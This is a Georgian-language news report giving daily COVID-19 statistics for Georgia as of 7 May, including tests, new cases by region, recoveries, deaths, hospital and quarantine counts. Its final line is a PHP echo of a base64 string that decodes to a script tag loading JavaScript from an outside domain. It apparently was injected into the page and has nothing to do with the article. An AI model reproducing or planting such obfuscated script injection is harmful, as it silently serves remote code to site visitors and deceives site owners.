celsiusi
ავერსი საქკაბელი
Stopcov.ge-ზე გამოქვეყნებული ინფორმაციით, ინტენსიური ტესტირების ფარგლებში, ბოლო 24 საათში ქვეყნის მასშტაბით ჩატარდა 27 384 კვლევა ტესტით, მათ შორის 15 341 კვლევა ანტიგენის ტესტით, ხოლო 12 043 - PCR ტესტით.
 
ჩატარებული ტესტირების შედეგად, ბოლო 24 საათში ვირუსით ინფიცირების 1 564 ახალი დადასტურებული შემთხვევა გამოვლინდა. ქვეყანაში კოვიდ-19-ის პანდემიის გავრცელებიდან დღემდე გამოვლენილი დადასტურებული შემთხვევების საერთო რაოდენობამ 320 830 შეადინა.
 
რაც შეეხება დადებითობის მაჩვენებელს, 7 მაისის მდგომარეობით, დადებითობის დღიური მაჩვენებელი 5.71%-ია, ბოლო 14 დღის მანძილზე - 5.84%, ხოლო 7 დღის მანძილზე - 6.71%.
 
ბოლო 24 საათში ვირუსისგან 693 პირი გამოჯანმრთელდა და ჯამში გამოჯანმრთელებულთა რაოდენობა 299 500-მდე გაიზარდა.
 
ბოლო 24 საათში კორონავირუსით გარდაცვალების 18 ახალი შემთხვევა დაფიქსირდა. პანდემიის გავრცელებიდან დღემდე ვირუსს ჯამში 4 263 პირი ემსხვერპლა.
 
კოვიდ-ინფიცირების გეოგრაფია კი ასეთია: ქვეყანაში გამოვლენილი ინფიცირების 1 564 ახალი შემთხვევიდან: თბილისში - 900, აჭარაში - 105, იმერეთში - 162, ქვემო ქართლში - 72, შიდა ქართლში - 52, გურიაში - 36, სამეგრელო - ზემო სვანეთში - 115, კახეთში - 64, მცხეთა-მთიანეთში - 31, სამცხე-ჯავახეთში - 18, რაჭა-ლეჩხუმსა და ქვემო სვანეთში კი 9 შემთხვევა გამოვლინდა.
ამ ეტაპზე ინფიცირების 17 041 მიმდინარე აქტიური შემთხვევაა, საიდანაც: 4 284 ადამიანი საავადმყოფოში მკურნალობს, მათ შორის, თბილისის საავადმყოფოებში - 2 470, აჭარაში - 493, იმერეთში - 443. ამ ეტაპზე მძიმე პაციენტია 912 პირი, მათ შორის, თბილისში - 485, აჭარაში - 83, იმერეთში -114. ხელოვნური სუნთქვის აპარატზე იმყოფება 186 პირი, მათგან თბილისში - 126, აჭარაში - 11, იმერეთში - 12. 788 ადამიანი მოთავსებულია კლინიკურ-სასტუმროებში, მათ შორის 427 - თბილისში, 332 კი აჭარაში. 11 969 პირი ვირუსის მკურნალობის კურსს საცხოვრებელ ბინაზე გადის.
 
საკარანტინე სივრცეებში მოთავსებულია 69 ადამიანი: თბილისში - 61, ხოლო აჭარაში - 7.
 
სულ 6 ოქტომბრიდან - 7 მაისის პერიოდში, სახელმწიფო საზღვრიდან საკარანტინე სივრცეებში 24 618 პირის გადაყვანილი.
ამ ეტაპისთვის თვითიზოლაციაში 35 534 ადამიანი იმყოფება, აქედან თბილისში - 27 324 პირი, აჭარაში - 2 135, იმერეთში კი 1 080.
1059
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");